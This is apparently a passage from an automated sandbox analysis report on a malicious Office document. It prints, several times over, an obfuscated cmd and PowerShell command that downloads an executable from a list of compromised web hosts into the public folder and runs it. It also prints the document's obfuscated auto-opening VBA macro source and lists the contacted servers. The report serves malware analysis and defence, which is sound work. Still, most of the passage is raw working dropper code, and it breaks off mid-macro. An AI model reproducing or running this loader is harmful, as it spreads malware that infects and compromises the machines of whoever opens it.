'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (UID: 00045852-00002952, Additional Context: "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))") - source
- Monitored Target
- relevance
- 10/10
-
Invokes a process with a very long commandline
- details
-
"Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" on 2018-5-17.00:56:07.351, "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" on 2018-5-17.00:56:07.701 - source
- Monitored Target
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Informative 20
-
Anti-Reverse Engineering
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details
- "powershell.exe" is allocating memory with PAGE_GUARD access rights
- source
- API Call
- relevance
- 10/10
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
-
Environment Awareness
-
Tries to sleep for a long time (more than two minutes)
- details
- "powershell.exe" sleeping for "1566804069" milliseconds
- source
- API Call
- relevance
- 10/10
-
Tries to sleep for a long time (more than two minutes)
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO EXE - Served Attached HTTP" (SID: 2014520, Rev: 6, Severity: 3) categorized as "Misc activity"
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Contacts domains
- details
- "ifcingenieria.cl"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"138.0.120.12:80"
"37.120.170.231:443"
"81.21.67.85:8080" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "zTZADLcFXJtFRE.cls" (Streampath: "Macros/VBA/zTZADLcFXJtFRE") has code: "Sub GuJqoJ(uIvtS)fWYTPG = NfmOGUlKuOr = (zhISt / MKOVL / 95319 / Fix(lQzuPm)) + 9692 - CLng(kbHukT + CLng(4429)) + jNjBO + 98203 * NFaHud - CStr(97948) / aQNjq / CLng(QicmVO)End SubSub BYJoK(iIfwim)lopfK = mRhiWLjTjDO = (krMhQS / nTBuUj / 93344 / Fix(zbozb)) + 30534 - CLng(oTumDw + CLng(10735)) + YbhlC + 51901 * GZMaR - CStr(34687) / mJmoo / CLng(ruGmcH)sndOl = IcSnzuaUPkBz = (YhkAP / VUiVu / 17946 / Fix(YjTvzp)) + 68463 - CLng(nTVot + CLng(83577)) + WfWli + 94338 * LCdzbM - CStr(77145) / ztozYt / CLng(TmLOA)NOLVSL = wzIiztQSwOW = (pWcAt / QULja / 31136 / Fix(uzoSdI)) + 1963 - CLng(zwkJCf + CLng(47063)) + Bnzrfu + 83935 * Kczvdm - CStr(30277) / OBwXcA / CLng(FVfqX)End SubSub qrnrjK(cYQzFC)BIFNM = CvBjAJSsVAE = (tUkME / cTFpkw / 33776 / Fix(sUwQSd)) + 79918 - CLng(vpGqaI + CLng(57392)) + CQvmIm + 31019 * BTjOwF - CStr(31977) / jjIzvF / CLng(aiDYuF)STqVn = DfRGEPwtbt = (ZZHrAj / ziUIEO / 40786 / Fix(nAQYaS)) + 93344 - CLng(ERCsuq + CLng(69061)) + DJiVjG + 52892 * Jjpli - CStr(44295) / rjKbz / CLng(CTYcvD)End SubSub Autoopen()On Error Resume NextwnuHwn = ujzKhwOucK = (hDKJkO / EAqJsl / 5329 / Fix(UWmhn)) + 92083 - CLng(TLjzt + CLng(46233)) + nYvRAW + 43627 * dJsLiE - CStr(6989) / GZfYb / CLng(IuXzPk)musHwkwosI (ZkVOXN + dowlFKYHb + Oalji)scpbMN = pcaOzuQAuA = (moDYX / LrlIjo / 97175 / Fix(uAjFwm)) + 3288 - CLng(KzJHO + CLng(37268)) + BNjkZ + 85160 * oDSdBW - CStr(57435) / wmPGJt / CLng(vzOFRi)End SubSub PPirZ(vzDYBB)cnSkf = dAWrIJRRiVU = (OhoCuJ / tlzjqE / 15825 / Fix(HIidZa)) + 1303 - CLng(sYaiA + CLng(36452)) + QiEamf + 76967 * XbizsD - CStr(76827) / DBrJJ / CLng(suAOb)dUbwaH = AmiVCTHCqcI = (EXXjJ / UMqJZ / 47277 / Fix(rHDzm)) + 43266 - CLng(XnOYfp + CLng(79591)) + wpDXFY + 85293 * wumRn - CStr(37047) / cEwwc / CLng(DDEGY)RIwBUU = QAGBSfBGFzFz = (cmTiq / WtmzR / 64639 / Fix(bzwtSw)) + 9583 - CLng(KWCdS + CLng(55894)) + wwEBa + 52647 * WiSdHL - CStr(43980) / GklmX / CLng(ILhIs)End SubSub SQQFY(HwnuQG)mbTbo = tjvPSsFLomXs = (aWGNNF / DaaMU / 58582 / Fix(lcoks)) + 36527 - CLng(UWAwMr + CLng(59451)) + IBWXYr + 30228 * FOjSp - CStr(11483) / DzOMT / CLng(ACfZjF)End Sub"
File "FPAOsHRZpzGcVH.bas" (Streampath: "Macros/VBA/FPAOsHRZpzGcVH") has code: "Sub VIAJOC(BwfLOI)qwplPP = NVahnvAIjza = (hWYZq / HNCjjs / 18890 / Fix(zwQqFr)) + 83688 - CLng(nabaH + CLng(70764)) + qvNnq + 33935 * ZPvSI - CStr(55930) / mtpiU / CLng(Brsri)End SubFunction dowlFKYHb()On Error Resume NextZiwzPq = NMnTFJfZBv = (jOwBhm / mWzwDV / 9332 / Fix(skaSf)) + 53531 - CLng(PwwZkK + CLng(21676)) + bqwEzL + 54722 * RKTDzO - CStr(26130) / zACQuz / CLng(QLzwzD)csvhf = QZIMrHREbSi = (tsimY / KURAv / 58378 / Fix(irUEH)) + 78375 - CLng(LbpUXX + CLng(3634)) + zllLr + 7465 * duGXL - CStr(39646) / wZNiU / CLng(azAUd)tMMvPYQ = wQpJm("t.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZ", 19335 + 5 - 19335, 19335 + 82 - 19335)wSCNOA = BUjPjSfOZzj = (SwdQGp / ciCkQ / 66436 / Fix(Hkajs)) + 43061 - CLng(TuRKiv + CLng(4753)) + MXCkzX + 231 * mHZwrS - CStr(34467) / wAmLvn / CLng(FNmzBL)HsMznz = LKiaZZlhupXA = (bLzFvh / YwOzvi / 67115 / Fix(lmVnV)) + 79349 - CLng(ZufjfW + CLng(25988)) + lSDEfj + 29026 * sPkmLT - CStr(55580) / rDjvIT / CLng(iwAlCa)LshKN = wQpJm(".EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada", 11928 + 2 - 11928, 11928 + 109 - 11928)BTLEd = riDVWsXlCQGR = (scnSl / iZHfv / 24714 / Fix(jNQbG)) + 80302 - CLng(mMANYP + CLng(82968)) + tujfk + 46983 * ZjsTM - CStr(93894) / WXZJY / CLng(JUbKQT)jBihNL = oaCbzNwVTSGI = (PFHVrL / HJhvsO / 18327 / Fix(GwRUlT)) + 38864 - CLng(bOZZs + CLng(14552)) + XkRCR + 92432 * LWzDh - CStr(32905) / fEwpA / CLng(VAmWL)cwAkETD = wQpJm("w0mU9;)CDSAxmU9+m'+'U91
mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv", 29734 + 5 - 29734, 29734 + 66 - 29734)ljGSmk = tKLaLsjmvUh = (DwvJak / suWwvr / 42585 / Fix(rEDNS)) + 64402 - CLng(KUdmw + CLng(99052)) + iFRoZr + 75367 * zrBsHw - CStr(76000) / fUWrs / CLng(rHPEfn)oCahOj = HjokjBVZSKq = (awnkY / QwQPtH / 11663 / Fix(vWmWIz)) + 15974 - CLng(oIGYv + CLng(17090)) + OiQjK + 15385 * OpJOTr - CStr(81761) / vccWU / CLng(nwCswQ)ANzhp = wQpJm("wCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W", 52910 + 5 - 52910, 52910 + 175 - 52910)idAEH = CjcXvWHwMti = (TUNdv / oLbmO / 81963 / Fix(rjjLJ)) + 20646 - CLng(DonTF + CLng(64738)) + QrrjI + 27736 * wnRAEf - CStr(36711) / atNhji / CLng(YkDiS)lZMhf = XfzUiiEUGNS = (YjGiLq / fbTvhr / 63518 / Fix(RBovr)) + 16916 - CLng(ldULG + CLng(66071)) + cMJmV + 88738 * irAqs - CStr(82894) / LEnrvU / CLng(TSRaTQ)EoHkR = wQpJm("5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uC", 26023 + 4 - 26023, 26023 + 153 - 26023)cNAkEM = HlvWmoKnFzRN = (ZhUKO / JtsLBi / 52084 / Fix(dAGoi)) + 93274 - CLng(TrUIj + CLng(98240)) + iMbBC + 40466 * fjZqf - CStr(80549) / skUIN / CLng(jnwKmQ)BQrOHf = MZvXvabURH = (VtdUbt / jrAmZj / 16952 / Fix(mumSb)) + 37858 - CLng(CuazXQ + CLng(19306)) + ljBFn + 91155 * wQUbv - CStr(52000) / mVrmf / CLng(hhwfOl)aYofqzcWsE = wQpJm("WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.", 41226 + 4 - 41226, 41226 + 50 - 41226)itbVQZ = OCYaVczWzzY = (rIFHk / VhDkVr / 4385 / Fix(pCpwL)) + 41532 - CLng(wkwRRD + CLng(49353)) + LBjpcA + 50890 * TlfEvL - CStr(34057) / jSYZv / CLng(wnCKuX)kdwFL = HTRkCJzPSzwM = (FCTUlV / zRqbcE / 81917 / Fix(mKNpF)) + 5216 - CLng(OLLwBP + CLng(39254)) + vhwPNh + 19710 * UqrJBb - CStr(17078) / EGccIl / CLng(GlLoI)wCffbz = wQpJm("I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- )mU9}'+'}'+'mU9+mU9{hCk", 17110 + 3 - 17110, 17110 + 48 - 17110)mTjcr = tfpdnctzNssn = (luvmr / JYpiC / 88107 / Fix(VhWIj)) + 20503 - CLng(PuPcoA + CLng(52883)) + JtsSAF + 44570 * XwlYmU - CStr(79997) / btaLL / CLng(EMhHnr)JuvDJF = PoiZunucGjYk = (sAAuv / dOqqEZ / 90260 / Fix(IVXbc)) + 23268 - CLng(KVDXnK + CLng(39074)) + woPbKQ + 87584 * IOYTBw - CStr(77544) / UtclG / CLng(IwYfhf)wdBSwU = wQpJm("
jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ", 58872 + 6 - 58872, 58872 + 177 - 58872)XIWIor = owksPPMDtoM = (jDthiT / jTCfj / 26953 / Fix(lFBKMG)) + 75181 - CLng(WIkWjT + CLng(91490)) + fqVwNT + 28050 * aUcUVv - CStr(8709) / BbdHC / CLng(bGtDhl)jjNdYA = jmcSfwYzanJ = (quaRiC / dZitb / 8309 / Fix(pGVcXk)) + 55193 - CLng(NhHwRw + CLng(94753)) + XuHEz + 73123 * wvWfU - CStr(13185) / jqbEj / CLng(izPYU)cUuaIu = wQpJm("DF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UY", 94876 + 5 - 94876, 94876 + 173 - 94876)hsJjlW = OGwUzuzYhBF = (mGwQW / Rfjaf / 66422 / Fix(AEQmLk)) + 17538 - CLng(sAlWcK + CLng(57507)) + FPNTM + 22368 * utMYEA - CStr(64062) / SlPuwh / CLng(VQvUtF)NTKLZ = XsjLjoqijIN = (DfjNjK / AoOCj / 54910 / Fix(bvPcwB)) + 69517 - CLng(dKTmYz + CLng(6402)) + GjmJwm + 64514 * aBAYi - CStr(56912) / iHzMuT / CLng(LLMJC)ZiFiTzufS = wQpJm("R7izc[
)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf", 24238 + 5 - 24238, 24238 + 59 - 24238)uwmaw = HWuTopJBvBL = (zjpfZ / IfAUbz / 74975 / Fix(LLiOac)) + 86090 - CLng(HkoKW + CLng(62839)) + EQKAz + 6285 * ERMnoK - CStr(13755) / TVBGC / CLng(XjbjSd)HOsvr = TWGuWuwLApZ = (dwfUu / TckXY / 50269 / Fix(pKLZj)) + 21599 - CLng(ArsMn + CLng(14632)) + vFvmP + 78713 * RGbuz - CStr(88126) / UjwiU / CLng(EAmlU)dJWjr = wQpJm("76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuS", 47045 + 5 - 47045, 47045 + 83 - 47045)SNlESh = mYXolIFYEkfi = (jjIti / DLuSK / 33369 / Fix(WzfCIN)) + 20327 - CLng(zwuNZ + CLng(67532)) + jwCGmN + 66018 * dKoOja - CStr(57345) / iUYOF / CLng(BbSXJk)qDAuF = mVUSbiSqfOR = (cBJZh / SFtVwz / 83973 / Fix(pGjDU)) + 12607 - CLng(QTwzsI + CLng(28108)) + ZFGff + 26388 * hiTLn - CStr(83283) / zWSjJQ / CLng(GbuLK)UKjPWqjNw = wQpJm("07zsP$+]4[emOHsp$ ( .ta9.", 68412 + 5 - 68412, 68412 + 18 - 68412)hMcob = mUQrULnYFk = (SDXTZ / JwzGSi / 22342 / Fix(VCTUB)) + 58690 - CLng(jEZjiw + CLng(45702)) + doBqls + 13920 * OmwfcG - CStr(62350) / mjAqJ / CLng(DEGXj)sJmwrY = tvOwdEiPquj = (PbjQwu / WXmfQ / 4828 / Fix(MQnoGJ)) + 96537 - CLng(PSXZN + CLng(27968)) + IkwBO + 32621 * cWBwS - CStr(67353) / IjfaP / CLng(SbCoZs)ljaakrr = wQpJm("lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7f", 96976 + 7 - 96976, 96976 + 196 - 96976)LOsXhr = PCiPoSnRmJrP = (GiswwX / jiIbV / 39103 / Fix(OdiOa)) + 67680 - CLng(GAQmw + CLng(90704)) + KPiidz + 9773 * 